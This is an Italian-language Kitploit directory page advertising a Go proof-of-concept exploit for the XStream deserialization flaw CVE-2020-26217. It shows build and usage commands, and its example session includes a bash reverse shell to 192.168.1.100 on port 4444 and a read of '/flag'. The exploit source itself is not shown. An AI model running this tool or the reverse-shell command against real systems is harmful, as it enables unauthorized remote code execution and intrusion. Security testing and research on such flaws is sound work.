Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-26217-XStream — CVE-2020-26217 XStream poc di deserializzazione | Kitploit
Strumenti/GitHubGitHub/kairo-one/cve-2020-26217-xstream
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubkairo-one/cve-2020-26217-xstream

CVE-2020-26217-XStream

CVE-2020-26217 XStream poc di deserializzazione

Vedi Repository
29 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-26217 XStream RCE Exploit

Strumento di sfruttamento della vulnerabilità di esecuzione di codice remoto in XStream.

Descrizione della vulnerabilità

CVE-2020-26217 è una vulnerabilità di deserializzazione nella libreria XStream che consente a un attaccante di attivare l'esecuzione di codice remoto tramite dati XML dannosi.

Versioni interessate: XStream <= 1.4.13

Utilizzo

root@kitploit:~
go run poc.go <URL_target>

Esempio

root@kitploit:~
# Esecuzione dello strumento
go run poc.go http://target.com:8080/?data

# Dopo essere entrati in modalità interattiva, inserisci i comandi
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit

Caratteristiche

  • Esecuzione interattiva dei comandi
  • Analisi automatica del nome del parametro URL
  • Codifica Base64 per bypassare il filtro dei caratteri speciali
  • Supporto HTTPS (salta la verifica del certificato)
  • Compilazione

    root@kitploit:~
    go build -o poc poc.go
    

    Disclaimer

    Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e ai test autorizzati. Non utilizzarlo per scopi illegali. L'utente si assume la piena responsabilità legale.

    Scarica lo strumento